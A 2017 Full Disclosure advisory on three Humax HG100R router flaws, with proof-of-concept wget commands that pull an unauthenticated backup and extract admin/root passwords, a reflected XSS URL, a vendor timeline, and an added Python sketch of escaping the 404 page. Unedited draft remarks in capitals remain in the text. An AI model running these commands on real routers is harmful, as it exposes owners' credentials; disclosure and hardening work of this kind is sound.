List: full-disclosure
Subject: [FD] Humax Digital HG100R multiple vulnerabilities
From: The Gambler <gambler () tutanota ! com>
Date: 2017-06-29 21:11:56
Message-ID: KnpgY6y--3-0 () tutanota ! com
Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6
- Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to provide ADSL internet service to household and small business users. (CHECK THIS INFO) Downloading the backup file does not require credentials or any authentication, and the router credentials are stored in plaintext inside the backup.
PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
--------------------------------------------------------------------------------
- XSS Reflected (CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. BRIEFLY DESCRIBE WHAT REFLECTED XSS IS AND SAY WHAT CAN BE DONE TO THE USER WITH IT. There is reflected XSS on the 404 page.
PoC
http://192.168.0.1<script>alert('XSS')</script>
--------------------------------------------------------------------------------
- Default credentials to router's web application not declared in the manual (CVE-2017-7317)
I DIDN'T UNDERSTAND THIS SENTENCE. WHAT DID YOU MEAN? An issue was discovered on Humax Digital HG100 2.0.6 devices. The attacker can find the root credentials in the backup file.
PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root
Timeline
2017-03-15 - First contact. Ignored by the vendor.
2017-03-21 - Second contact.
2017-03-22 - The vendor answered asking about the vulnerability.
2017-03-27 - Asked the vendor for their security team's contact information to report the vulnerability.
2017-03-28 - The vendor answered saying that it is an old product, and they will check these vulnerabilities in the new products.
2017-03-28 - Asked the vendor about a patch.
2017-03-30 - Asked the vendor again about the patch.
2017-04-03 - Notified the vendor about the disclosure after 90 days, even without a patch.
2017-04-19 - Asked the vendor about a patch.
2017-05-08 - Asked the vendor about a patch.
2017-06-29 - Disclosure.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
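
Added example, not part of the original advisory and not Humax firmware code: a sketch of the 404-page flaw reported as CVE-2017-7316 beside a hardened renderer that HTML-escapes the requested path. The template text, function names and response headers are assumptions made for illustration; only the probe string is taken from the advisory.

```python
import html
from urllib.parse import unquote

# Constructed template: the device's real 404 markup is not shown in the advisory.
TEMPLATE = (
    "<html><body><h1>404 Not Found</h1>"
    "<p>The requested URL {path} was not found.</p></body></html>"
)

def render_404_vulnerable(raw_path):
    """Reported behaviour: the request path is copied into the page verbatim."""
    return TEMPLATE.format(path=unquote(raw_path))

def render_404_hardened(raw_path):
    """Decode the path first, then escape it for the HTML body context."""
    decoded = unquote(raw_path)
    return TEMPLATE.format(path=html.escape(decoded, quote=True))

def hardened_headers():
    """Defence in depth for an error page that needs no scripts at all."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'",
    }

def reflects_markup(page, probe):
    """True when the probe appears unescaped in the rendered page."""
    return probe in page

if __name__ == "__main__":
    probe = "<script>alert('XSS')</script>"       # path used in the advisory's PoC
    encoded = "%3Cscript%3Ealert('XSS')%3C/script%3E"  # same path, percent-encoded
    for path in (probe, encoded):
        print("vulnerable reflects:",
              reflects_markup(render_404_vulnerable(path), probe))
        print("hardened reflects:  ",
              reflects_markup(render_404_hardened(path), probe))
```

Escaping after decoding matters: escaping the still percent-encoded path would leave the markup intact once the browser or a later layer decodes it.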